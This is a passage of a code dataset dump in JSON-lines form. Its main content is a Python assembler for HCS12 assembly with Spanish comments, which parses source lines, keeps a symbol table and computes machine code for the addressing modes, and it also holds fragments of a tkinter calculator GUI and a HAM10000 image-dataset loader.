   else:\n                ttk.Style().configure(\"TLabel\", font='Times 20')\n            self.label_text.set(to_display)\n\n    def keyboard_event_binding(self):\n        self.bind(\"<Key>\", self._callback)  # the event name was missing; bind every key press to _callback\n\n    def _callback(self, e):\n        if e.char.lower() in self._layout:\n            self._button_invoke(e.char)\n        elif e.char.lower() == 'c':\n            self._button_invoke('Copy')\n        elif e.char.lower() == 'a':\n            self._button_invoke('A')\n        elif e.char.lower() == 'i':\n            self._button_invoke('i')\n        elif e.char == '\\r':\n            self._button_invoke('=')\n        elif e.char.lower() in ('\\x08', 'b'):\n            self._button_invoke('C')\n        elif e.char.lower() == 'q':\n            self.destroy()\n        elif e.char == '(':\n            self._button_invoke('(')\n        elif e.char == ')':\n            self._button_invoke(')')\n\n    def _get_answer(self, inputs_as_list):\n        calculate_instance = Calculate(inputs_as_list)\n        return calculate_instance.calculate()\n\n    def _copy_to_clipboard(self, inputs_as_list):\n        to_clipboard(\"\".join(inputs_as_list))\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"294445436","text":"import re\n\nfrom f02_Variables import archivoEnsamblador, totalDireccionamiento, archivo_listado, tabla_simbolos\nfrom f02_Variables import SALTO_LINEA, PUNTO_COMA, ESPACIO, TABULADOR\nfrom Ensamblador.f01_Tabop import direccionamiento_particular_tabop\nfrom Ensamblador.f04_Evaluacion import evaluar_codop, evaluar_etiqueta, existe_codop_en_tabop, codopTieneOperando\nfrom Ensamblador.f05_Direccionamientos import direccionamiento_correspondiente\nfrom 
Ensamblador.f06Evaluar_Direccionamientos import validar_operando_directo_o_extendido\nfrom Ensamblador.f02_Variables import diccionario_codop\n\nexiste_end = False\nexiste_org = False\nlista_etiquetas = []\nname_archivo = ''\nDIR_INIC = 0\ntemp = ''\nCONTLOC = 0\ncodigoMaquina = 0\nANADIR_FINAL = 'w+'\nLECTURA = 'r'\nresultado_evaluacion = ''\n#----------------------------------------------------------------------------------\n# Reads the text file containing the assembly-language instructions line by\n# line and stores every non-empty line read in the 'archivoEnsamblador' list\n#----------------------------------------------------------------------------------\ndef leer_archivo_ensamblador(nombre_archivo):\n    global name_archivo\n    name_archivo = nombre_archivo\n\n    try:\n        with open(nombre_archivo, LECTURA) as archivo:\n            for linea in archivo:\n                if(len(linea) > 1):\n                    archivoEnsamblador.append(linea)\n    except:\n        print('%s (El sistema no puede encontrar el archivo especificado)' %nombre_archivo)\n\n\n#-----------------------------------------------------------------------------------------\n# Evaluates each assembly-language line stored in the 'archivoEnsamblador' list,\n# skipping the lines that are blank\n#-----------------------------------------------------------------------------------------\ndef evaluar_lineas_ensamblador(diccionario_codop):\n    global existe_end\n    global archivo\n    global temp\n    contador = 0\n    \n    ANADIR_FINAL = 'w+'\n    temp = name_archivo[0:2]+'tmp.txt'\n    archivo_temporal = open(temp, ANADIR_FINAL)\n    tabsim = open('tabsim.txt', ANADIR_FINAL)\n    \n    for linea in archivoEnsamblador:\n        estaVacia = evaluar_lineas_sin_contenido(linea)\n        if(not estaVacia):\n            if(existe_end and contador == 0):\n                print('\\n\\n:::::::::::::::::::::: ADVERTENCIA :::::::::::::::::::::::\\n ~ Las siguientes lineas no seran evaluadas ~\\n\\n') \n                contador = 1\n            evaluar_linea_ensamblador(linea, diccionario_codop, archivo_temporal, tabsim)\n    # When finished, report an error if the 'END' directive was never found\n    if(not existe_end):\n        print('ERROR DE CODIGO DE OPERACION: No se encontro el END')\n    print('\\nDIR_INIC = %d ::: CONTLOC = %d\\nLongitud en bytes = %d' %(DIR_INIC, CONTLOC, (CONTLOC-DIR_INIC)))\n    archivo_temporal.close()\n    tabsim.close()\n    archivo_de_listado()\n    archivo_tabsim()\n    evaluar_lineas_de_listado()\n    \ndef archivo_de_listado():\n    try:\n        with open(temp, LECTURA) as archivo:\n            for linea in archivo:\n                if(len(linea) > 1):\n                    archivo_listado.append(linea.split('|'))\n    except:\n        print('%s (El sistema no puede encontrar el archivo especificado)' %temp)  # was nombre_archivo, undefined in this scope\n\ndef archivo_tabsim():\n    try:\n        with open('tabsim.txt', LECTURA) as archivo:\n            for linea in archivo:\n                if(len(linea) > 1):\n                    tabla_simbolos.append(linea.split('|'))\n    except:\n        print('%s (El sistema no puede encontrar el archivo especificado)' %'tabsim.txt')  # was nombre_archivo, undefined in this scope\n    \ndef evaluar_lineas_de_listado():\n    print('-'*100)\n    print('-'*100)\n    for linea in archivo_listado: \n        valor = linea[0]\n        etiqueta = linea[1]\n        codop = linea[2]\n        operando = linea[3]\n        direccionamiento = linea[4][:-1]\n        \n        print('VALOR = '+valor)\n        print('ETIQUETA = '+etiqueta)\n        print('CODOP = '+codop)\n        print('OPERANDO = '+operando)\n        \n        if(direccionamiento.lower() == 'error'):\n            #print('\\t\\tERROR: No es posible calcular el codigo maquina')\n            pass\n        else:\n            codigo_maquina = calcular_codigo_maquina(direccionamiento, codop, operando)\n            print('CODIGO MAQUINA = '+codigo_maquina)\n
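            # echo the addressing-mode descriptor that produced this machine code\n            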
print('\\n',direccionamiento)\n print()\n print('-'*50)\n print()\n \ndef calcular_codigo_maquina(info_direccionamiento, codop, operando):\n codigoMaquinaCalculado = ''\n codigoMaquinaTabop = ''\n valor_hexadecimal = ''\n registro_computadora = {'X':'00','Y':'01','SP':'10','PC':'11'}\n registro_valor = {'A':'00','B':'01','D':'10'}\n \n informacion = info_direccionamiento.split(', ')\n direccionamiento = informacion[0] \n #bytes_correspondientes = informacion[1] \n if(direccionamiento.lower() == 'inherente'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'inh'):\n codigoMaquinaTabop = direccionamientos[3]\n codigoMaquinaCalculado = codigoMaquinaTabop\n elif(direccionamiento.lower() == 'directo'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'dir'):\n codigoMaquinaTabop = direccionamientos[3]\n ###\n valor_decimal = convertir_operando_a_hexadecimal(operando)\n valor_hexadecimal = format(valor_decimal, '02X')\n codigoMaquinaCalculado = codigoMaquinaTabop + valor_hexadecimal\n elif(direccionamiento.lower() == 'extendido'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'ext'):\n codigoMaquinaTabop = direccionamientos[3]\n ###\n if(es_numerico(operando[1:])):\n valor_decimal = convertir_operando_a_hexadecimal(operando)\n valor_hexadecimal = format(valor_decimal, '04X')\n else:\n for etiqueta in tabla_simbolos:\n if(operando == etiqueta[0]):\n valor_hexadecimal = etiqueta[1][:-1]\n codigoMaquinaCalculado = codigoMaquinaTabop + valor_hexadecimal\n elif(direccionamiento.lower() == 'inmediato de 8 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'inm'):\n codigoMaquinaTabop = direccionamientos[3]\n ###\n valor_decimal = convertir_operando_a_hexadecimal(operando[1:])\n valor_hexadecimal = format(valor_decimal, '02X')\n codigoMaquinaCalculado = codigoMaquinaTabop + valor_hexadecimal\n elif(direccionamiento.lower() == 'inmediato de 16 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'inm'):\n codigoMaquinaTabop = direccionamientos[3]\n ###\n valor_decimal = convertir_operando_a_hexadecimal(operando[1:])\n valor_hexadecimal = format(valor_decimal, '04X')\n codigoMaquinaCalculado = codigoMaquinaTabop + valor_hexadecimal\n elif(direccionamiento.lower() == 'indizado de 5 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n if(valor == ''): valor = '0'\n registro = partes_operando[1]\n \n bytesRegistro = registro_computadora[registro.upper()]\n # \n if(int(valor) >= 0):\n valor_en_binario = format(abs(int(valor)), '#07b')[2:]\n else:\n valor_en_binario = format(abs(int(valor)), '#07b')[2:]\n valor_complementoa2 = complementoados(valor_en_binario)\n valor_en_binario = valor_complementoa2\n \n postbyteCode = bytesRegistro+'0'+valor_en_binario\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte\n elif(direccionamiento.lower() == 'indizado de 9 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx1'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n if(valor == ''): 
valor = '0'\n registro = partes_operando[1]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n z ='0'\n if(int(valor) >= 0):\n valor_hexadecimal = format(abs(int(valor)),'02X')\n s = '0'\n else:\n valor_resultante = int(valor) + 256\n valor_hexadecimal = format(valor_resultante,'02X')\n s = '1'\n \n postbyteCode = '111'+bytesRegistro+'0' + z + s\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte + valor_hexadecimal\n \n elif(direccionamiento.lower() == 'indizado de 16 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx2'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n if(valor == ''): valor = '0'\n registro = partes_operando[1]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n z = '1'\n s = '0'\n \n postbyteCode = '111'+bytesRegistro+'0' + z + s\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n valor_hexadecimal = format(abs(int(valor)),'04X')\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte + valor_hexadecimal\n \n elif(direccionamiento.lower() == 'indizado de pre decremento'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1][1:]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n p = '0'\n \n valor_resultante = (int(valor)*-1) + 16\n valor_en_binario = format(valor_resultante, '#06b')[2:]\n \n postbyteCode = bytesRegistro+ '1' + p + valor_en_binario\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte \n \n elif(direccionamiento.lower() == 'indizado de post decremento'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1][:-1]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n p = '1'\n \n valor_resultante = (int(valor)*-1) + 16\n valor_en_binario = format(valor_resultante, '#06b')[2:]\n \n postbyteCode = bytesRegistro+ '1' + p + valor_en_binario\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte \n \n elif(direccionamiento.lower() == 'indizado de pre incremento'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1][1:]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n p = '0'\n \n valor_en_binario = format(int(valor)-1, '#06b')[2:]\n \n postbyteCode = bytesRegistro+ '1' + p + valor_en_binario\n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte\n \n elif(direccionamiento.lower() == 
'indizado de post incremento'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1][:-1]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n p = '1'\n \n valor_en_binario = format(int(valor)-1, '#06b')[2:]\n \n postbyteCode = bytesRegistro+ '1' + p + valor_en_binario\n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte\n \n elif(direccionamiento.lower() == 'indizado de acumulador'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n \n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1]\n \n bytesRegistro = registro_computadora[registro.upper()]\n ##\n a = registro_valor[valor.upper()]\n postbyteCode = '111'+bytesRegistro+ '1' + a\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte \n elif(direccionamiento.lower() == 'indizado indirecto de 16 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == '[idx2]'):\n codigoMaquinaTabop = direccionamientos[3]\n \n partes_operando = operando.split(',')\n valor = partes_operando[0][1:]\n registro = partes_operando[1][:-1]\n \n bytesRegistro = registro_computadora[registro.upper()]\n ##\n postbyteCode = '111'+bytesRegistro+ '011'\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte + format(int(valor), '04X')\n \n elif(direccionamiento.lower() == 'indizado de acumulador indirecto'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == '[d,idx]'):\n codigoMaquinaTabop = direccionamientos[3]\n \n partes_operando = operando.split(',')\n valor = partes_operando[0][1:]\n registro = partes_operando[1][:-1]\n \n bytesRegistro = registro_computadora[registro.upper()]\n ##\n postbyteCode = '111'+bytesRegistro+ '111'\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte \n return codigoMaquinaCalculado\n\ndef convertir_operando_a_hexadecimal(operando):\n valor_decimal = 0\n if(operando[0] == '@'):\n valor_decimal = (int(operando[1:], 8))\n elif(operando[0] == '%'):\n valor_decimal = (int(operando[1:], 2))\n elif(operando[0] == '$'):\n valor_decimal = (int(operando[1:], 16))\n elif((operando[0] >= '0' and operando[0] <= '9')):\n valor_decimal = int(operando)\n return valor_decimal\n \ndef es_numerico(operando):\n operando = operando.upper()\n esNumerico = False\n for caracter in operando:\n if(caracter >= '0' and caracter <= '9' or caracter >='A' and caracter <= 'F'):\n esNumerico = True\n else:\n return False\n return esNumerico\n\ndef complementoados(numero):\n i = len(numero)-1\n complemento = ''\n \n while(i >= 0):\n bit = numero[i]\n if(bit == '1'):\n i = i - 1\n complemento = bit + complemento\n break\n complemento = bit + complemento\n i = i - 1\n \n while(i >= 0):\n bit = numero[i]\n 
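# second pass: invert every remaining bit to the left of the lowest set '1' (two's-complement shortcut)\n        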
if(bit == '1'):\n            bit = '0'\n        elif(bit == '0'):\n            bit = '1' \n        complemento = bit + complemento\n        i = i - 1\n    return(complemento)\n#-----------------------------------------------------------------------------------------\n# Checks whether a line contains any character other than whitespace\n# (tab or blank space) before the newline\n#-----------------------------------------------------------------------------------------\ndef evaluar_lineas_sin_contenido(linea):\n    posicion = 0\n    if(linea[0] == '\\n'):\n        estaVacia = True\n    else:\n        while( linea[posicion] != '\\n' ):\n            if(linea[posicion] == ' ' or linea[posicion] == '\\t'):\n                estaVacia = True\n            else:\n                estaVacia = False\n                break\n            posicion += 1\n    return estaVacia\n\n#-----------------------------------------------------------------------------------------\n# Determines whether the line is a comment or, otherwise, extracts its\n# LABEL, OPERATION CODE and OPERAND fields\n#-----------------------------------------------------------------------------------------\ndef evaluar_linea_ensamblador(linea, diccionario_codop, archivo_temporal, tabsim):\n    global CONTLOC\n    global DIR_INIC\n    global lista_etiquetas\n    global codigoMaquina\n    global resultado_evaluacion\n    \n    etiqueta = ''\n    codop = ''\n    operando = ''\n    comentario = ''\n    aux = 0\n    posicion = 0\n    bytesTotales = 0\n    valor_equ = 0\n    etiquetaCompletada = False\n    codopCompletado = False\n    \n    lista_direccionamientos = []\n\n    if(linea[0] != SALTO_LINEA):\n        if(linea[0] == PUNTO_COMA):\n            comentario += linea\n        else:\n            while(len(linea) > posicion and not etiquetaCompletada):\n                caracter = linea[posicion]\n                if(caracter != SALTO_LINEA and caracter != ESPACIO and caracter != TABULADOR):\n                    etiqueta += caracter\n                    posicion += 1\n                    if(posicion >= len(linea)):\n                        codop = 'NULL'\n                        codopCompletado = True\n                        operando = 'NULL'\n                else:\n                    etiquetaCompletada = True\n                    while(linea[posicion] == ESPACIO or linea[posicion] == TABULADOR): \n                        posicion +=1 \n                    if(caracter == '\\n'):\n                        codop = 'NULL'\n                        codopCompletado = True\n                        operando = 'NULL'\n                        if(len(etiqueta) == 0):\n                            etiqueta = 'NULL'\n            while(len(linea) > posicion and not codopCompletado):\n                caracter = linea[posicion]\n                if(caracter != SALTO_LINEA and caracter != ESPACIO and caracter != TABULADOR):\n                    codop += caracter\n                    posicion += 1\n                    if(posicion >= len(linea)):\n                        operando = 'NULL'\n                else:\n                    codopCompletado = True\n                    while(linea[posicion] == ESPACIO or linea[posicion] == TABULADOR): \n                        posicion +=1 \n                    caracter = linea[posicion]\n                    if(caracter == SALTO_LINEA):\n                        operando = 'NULL'\n                        if(len(codop) == 0):\n                            codop = 'NULL'\n            while(len(linea) > posicion):\n                caracter = linea[posicion]\n                if(caracter != SALTO_LINEA):\n                    operando += caracter\n                posicion += 1\n    \n    #---------------------------------------------\n    # Display the results of the evaluation\n    #---------------------------------------------     \n    if(not existe_end):\n        if(len(comentario) > 0):\n            print('COMENTARIO')\n        else: \n            if(re.fullmatch('EQU', codop, re.IGNORECASE)):  # pattern goes first; fullmatch keeps 'E' or 'EQ' from matching too\n                valor_equ = resultados(etiqueta, codop, operando, diccionario_codop, lista_direccionamientos)\n            else:\n                bytesTotales = resultados(etiqueta, codop, operando, diccionario_codop, lista_direccionamientos)\n            \n            if(codop.upper() == 'EQU'):\n                if(valor_equ > 65535):\n                    valor = format(valor_equ, '05X')\n                else:\n                    valor = format(valor_equ, '04X')\n            else:\n                if(CONTLOC > 65535):\n                    valor = format(CONTLOC, '05X')\n                else:\n                    valor = format(CONTLOC, '04X')\n            while(4 > len(valor)):\n                valor = '0'+valor\n            if(etiqueta 
!= 'NULL' and len(comentario) == 0):\n existe = False\n for etq in lista_etiquetas:\n if(etiqueta.upper() == etq.upper()):\n existe = True\n print('\\t\\t ERROR DE ETIQUETA: La etiqueta ya existe')\n break\n if(not existe):\n lista_etiquetas.append(etiqueta)\n if(re.match(codop,'EQU',re.IGNORECASE)):\n tabla_simbolos = '%s|%s\\n' %(etiqueta, valor) #ETIQUETA ABSOLUTA\n else:\n tabla_simbolos = '%s|%s\\n' %(etiqueta,valor) #ETIQUETA RELATIVA\n tabsim.write(tabla_simbolos)\n if(len(comentario) == 0):\n if(len(resultado_evaluacion) == 0):\n resultado_evaluacion = 'Error'\n if(re.match(codop,'EQU',re.IGNORECASE) and valor_equ > 0):\n if(codigoMaquina != 0):\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando, resultado_evaluacion) #VALOR EQU\n codigoMaquina = 0\n else:\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando,resultado_evaluacion)#VALOR EQU\n elif(archivo_temporal.tell() > 0):\n if(codigoMaquina!= 0):\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando,resultado_evaluacion)#CONTLOC\n codigoMaquina = 0\n else:\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando,resultado_evaluacion)#CONTLOC\n else:\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando,resultado_evaluacion)#DIR_INIC\n archivo_temporal.write(cadena)\n resultado_evaluacion = ''\n \n if(CONTLOC >= 0 and len(comentario) == 0):\n if(int(bytesTotales) > 0 and codop.upper() != 'EQU'):\n aux = CONTLOC\n CONTLOC += int(bytesTotales)\n print('CONTLOC = %d + %d = %d' %(aux, int(bytesTotales),CONTLOC))\n if(CONTLOC > 65535):\n print('\\t\\t ERROR DE CONTLOC: El rango valido es de 0 a 65535')\n elif(int(valor_equ) > 0 and codop.upper() != 'EQU'):\n aux = CONTLOC\n CONTLOC += int(valor_equ)\n print('CONTLOC = %d + %d = %d' %(aux, int(valor_equ),CONTLOC))\n if(CONTLOC > 65535):\n print('\\t\\t ERROR DE CONTLOC: El rango valido es de 0 a 65535')\n else:\n print('CONTLOC = %d' %CONTLOC)\n codigoMaquina = 0\n print('-'*100)\n lista_direccionamientos.clear()\n \ndef resultados(etiqueta, codop, operando, diccionario_codop, lista_direccionamientos):\n global existe_end\n global existe_org \n global DIR_INIC\n global CONTLOC\n global codigoMaquina\n global resultado_evaluacion\n \n bytesTotales = 0\n \n codopValido = False\n print('ETIQUETA = '+etiqueta)\n if(re.match(codop, 'ORG|END', re.IGNORECASE) and etiqueta != 'NULL'):\n print('\\t\\t ERROR DE DIRECTIVA: La directiva %s no debe tener etiqueta' %codop.upper())\n elif(re.match(codop, 'EQU', re.IGNORECASE) and etiqueta == 'NULL'):\n print('\\t\\t ERROR DE DIRECTIVA: La directiva %s debe tener etiqueta' %codop.upper())\n else: \n evaluar_etiqueta(etiqueta)\n print('CODOP = '+codop)\n #-------------------------------------------------------------\n \n if(re.match(codop, 'ORG', re.IGNORECASE) and existe_org):\n print('\\t\\t ERROR DE DIRECTIVA: La directiva %s solo debe existir una vez' %codop.upper())\n #Si existe END en CODOP\n if(re.match(codop, 'END', re.IGNORECASE)):\n existe_end = True\n #Se evalua el CODOP para encontrar errores\n codopTieneErrores = evaluar_codop(codop)\n \n #Si ni tiene errores, se busca si existe el codop en el tabop\n if(not codopTieneErrores):\n codopValido = existe_codop_en_tabop(codop.upper(), diccionario_codop) \n \n #------------------------------------------------------------- \n print('OPERANDO = '+operando)\n if(re.match(codop, 'ORG', re.IGNORECASE) and not existe_org):\n existe_org = True\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= 
'9')):\n DIR_INIC = validar_operando_directo_o_extendido(operando)\n if(DIR_INIC == -1): DIR_INIC = 0\n else:\n DIR_INIC = 0\n print('\\t\\t ERROR DE OPERANDO: El valor de la directiva ORG debe estar representado en Decimal, Hexadecimal, Octal o Binario y tener un rango de 0 a 65535',DIR_INIC)\n CONTLOC = DIR_INIC\n print('\\t\\t La direccion inicial es: ',DIR_INIC)\n elif(re.match(codop, 'END', re.IGNORECASE) and operando != 'NULL'):\n print('\\t\\t ERROR DE OPERANDOV: La directiva END no debe tener operando')\n elif(re.match('DB|DC.B|FCB', codop, re.IGNORECASE)):\n #---------- 0 a 255 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 255):\n bytesTotales = 1\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 255'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o Binario'%codop.upper())\n elif(re.match('DW|DC.W|FDB', codop, re.IGNORECASE)):\n #---------- 0 a 65535 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 65535):\n bytesTotales = 2\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 65535'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o Binario'%codop.upper())\n\n elif(re.match('FCC', codop, re.IGNORECASE)):\n if(operando == 'NULL'):\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe ser representado en cualquier caracter ASCII'%codop.upper())\n else:\n if(chr(34) not in operando):\n print('\\t\\t ERROR DE SINTAXIS: La cadena debe estar representada entre las comillas de apertura y cierre')\n else:\n if(chr(34) == operando[0]):\n if(chr(34) == (operando[len(operando)-1])):\n bytesTotales = len(operando) - 2\n else:\n print('\\t\\t ERROR DE SINTAXIS: Falta la comilla de cierre')\n else:\n print('\\t\\t ERROR DE SINTAXIS: Falta la comilla de apertura')\n elif(re.match('DS.B|RMB', codop, re.IGNORECASE) or codop.upper() == 'DS'): ##error con los re.match\n #---------- 0 a 65535 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 65535):\n bytesTotales = valor * 1\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 65535'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o Binario'%codop.upper()) \n elif(re.match('DS.W|RMW', codop, re.IGNORECASE)):\n #---------- 0 a 65535 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 65535):\n bytesTotales = (valor * 2)\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 65535'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o 
Binario'%codop.upper()) \n elif(re.match('EQU', codop, re.IGNORECASE)):\n #---------- 0 a 65535 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 65535):\n bytesTotales = valor\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 65535'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o Binario'%codop.upper()) \n else:\n if(codop.upper() != 'END' and codopValido):\n totalDireccionamiento = direccionamiento_particular_tabop(codop, diccionario_codop, lista_direccionamientos)\n lista = direccionamiento_correspondiente(lista_direccionamientos, operando, CONTLOC)\n totalBytes = lista[0]\n bytesTotales = int(totalBytes)\n resultado_evaluacion = lista[1]\n if(codopValido):\n codopTieneOperando(codop.upper(), operando, diccionario_codop)\n print('DIRECCIONAMIENTO = ', totalDireccionamiento)\n return bytesTotales","sub_path":"[CC207] ~ Practica07/Ensamblador/f03_Ensamblador.py","file_name":"f03_Ensamblador.py","file_ext":"py","file_size_in_byte":33140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"316486087","text":"\"\"\"Module to parse dataset.\"\"\"\n\n# Imports.\nimport os\nfrom os.path import join\nimport glob\n\nimport pandas as pd\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# import torch\n\nfrom torch.utils.data import Dataset\n\n# import torchvision\n\nimport torchvision.transforms as transforms\n\n\ndef read_image_paths(data_dir):\n \"\"\"Read image paths from data directory.\n\n Args:\n data_dir (str): path to folder with images.\n\n Returns:\n image_paths (list): list of image paths.\n\n \"\"\"\n image_extension_pattern = '*.jpg'\n image_paths = sorted((y for x in os.walk(data_dir) for y in\n glob.glob(join(x[0], image_extension_pattern))))\n return image_paths\n\n\ndef get_image_paths_dict(data_dir):\n \"\"\"Create and return dict that maps image IDs to image paths.\n\n Args:\n data_dir (str): path to folder with images\n\n Returns:\n image_paths_dict (dict): dict to map image IDs to image paths.\n\n \"\"\"\n image_paths = read_image_paths(data_dir)\n image_paths_dict = {}\n for image_path in image_paths:\n image_id = image_path.split('/')[-1].split('.jpg')[0]\n image_paths_dict[image_id] = image_path\n\n return image_paths_dict\n\n\ndef read_meta_data(data_dir):\n \"\"\"Read meta data file using Pandas.\n\n Returns:\n meta_data (pandas.core.frame.DataFrame): meta-data object.\n\n \"\"\"\n meta_data = pd.read_csv(join(data_dir, 'HAM10000_metadata.csv'),\n index_col='image_id')\n return meta_data\n\n\ndef load_image(image_path):\n \"\"\"Load image as numpy array.\n\n Args:\n image_path (str): path to image.\n\n Returns:\n (numpy.ndarray): image as numpy array.\n\n \"\"\"\n return np.array(Image.open(image_path))\n\n\ndef show_images(images, cols=1, titles=None):\n \"\"\"Display multiple images arranged as a table.\n\n Args:\n images (list): list of images to display as numpy arrays.\n cols (int, optional): number of columns.\n titles (list, optional): list of title strings for each image.\n\n \"\"\"\n assert((titles is None)or (len(images) == len(titles)))\n n_images = len(images)\n\n if titles is None:\n titles = ['Image (%d)' % i for i in range(1, n_images + 1)]\n\n fig = plt.figure()\n\n for n, 
